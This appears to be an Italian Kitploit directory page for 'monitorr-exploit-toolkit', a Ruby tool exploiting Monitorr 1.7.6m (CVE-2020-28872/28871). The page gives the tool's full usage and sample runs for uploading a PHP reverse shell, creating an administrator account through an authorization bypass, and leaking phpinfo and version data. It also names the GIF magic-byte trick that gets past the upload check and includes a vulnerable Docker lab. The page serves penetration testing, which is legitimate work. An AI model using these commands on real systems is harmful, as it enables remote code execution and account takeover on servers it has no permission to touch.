Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
monitorr-exploit-toolkit — Multiple exploits for Monitorr | Kitploit
Strumenti/GitHubGitHub/sec-it/monitorr-exploit-toolkit
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubsec-it/monitorr-exploit-toolkit

monitorr-exploit-toolkit

Multiple exploits for Monitorr

Vedi Repository
1015 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Toolkit di exploit per Monitorr

  • RCE tramite caricamento di file non sicuro (reverse shell PHP, webshell, ecc.)
  • Creazione di un account amministratore tramite bypass dell'autorizzazione
  • Fuga di informazioni tecniche: versione di Monitorr, versione di PHP, versione del sistema e kernel, configurazione PHP, ecc.

Exploit per CVE-2020-28872 e CVE-2020-28871.

[PacketStorm]

Utilizzo

root@kitploit:~
$ ruby exploit.rb -h
Monitorr-Exploit

Usage:
  exploit.rb upload <url> <file> [--debug]
  exploit.rb create <url> <user> <pass> <email> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb phpinfo <url> [--debug]
  exploit.rb -h | --help

upload:       Upload a file (RCE via unrestricted file upload)
version:      Try to fetch Monitorr version
phpinfo:      Extract main phpinfo() information (Information leakage)
create:       Create an administrator account (Authorization bypass)

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <file>      File to be uploaded
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb upload http://example.org revshell.php
  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
  exploit.rb version https://example.org:7000/

Esempi

Carica una reverse shell:

root@kitploit:~
$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php

Creazione di un account amministratore:

root@kitploit:~
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password

Ottieni la versione di Monitorr:

root@kitploit:~
$ ruby exploit.rb version http://localhost:7000/
1.7.6m

Ottieni phpinfp():

root@kitploit:~
$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
PHP version: 7.1.17 
disable_functions: no value</i>
open_basedir: no value</i>

Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php

Requisiti

  • httpx
  • docopt.rb

Esempio con gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Distribuzione Docker del software vulnerabile

Attenzione: ovviamente questa configurazione non è adatta all'uso in produzione!

root@kitploit:~
$ sudo docker-compose up

Configura / inizializza l'app all'indirizzo http://127.0.0.1:7000/monitorr/settings.php.

Limitazioni

  • Upload: il file caricato deve avere un magic byte di immagine (es. GIF) per corrispondere a getimagesize (codice)
  • Create: la password utilizzata durante la creazione della password deve essere lunga almeno 6 caratteri (limite minimo dell'applicazione)

Riferimenti

  • Software bersaglio: Monitorr
    • Source: https://github.com/Monitorr/Monitorr/
    • Docker: https://hub.docker.com/r/monitorr/monitorr/
    • Versione vulnerabile: 1.7.6m

Questa è una riscrittura e una fusione migliori di EDB-48981 (CVE-2020-28872) e EDB-48980 (CVE-2020-28871) con funzionalità extra.

Le vulnerabilità di upload e creazione di account amministratore sono state scoperte da Lyhin's Lab. La fuga di phpinfo e della versione di Monitorr è stata scoperta da Alexandre ZANNI aka noraj.

Analisi dell'exploit e della vulnerabilità originali:

  • Come funziona l'hacking White-Box: bypass dell'autorizzazione ed esecuzione remota di codice in Monitorr 1.7.6
Scarica lo strumento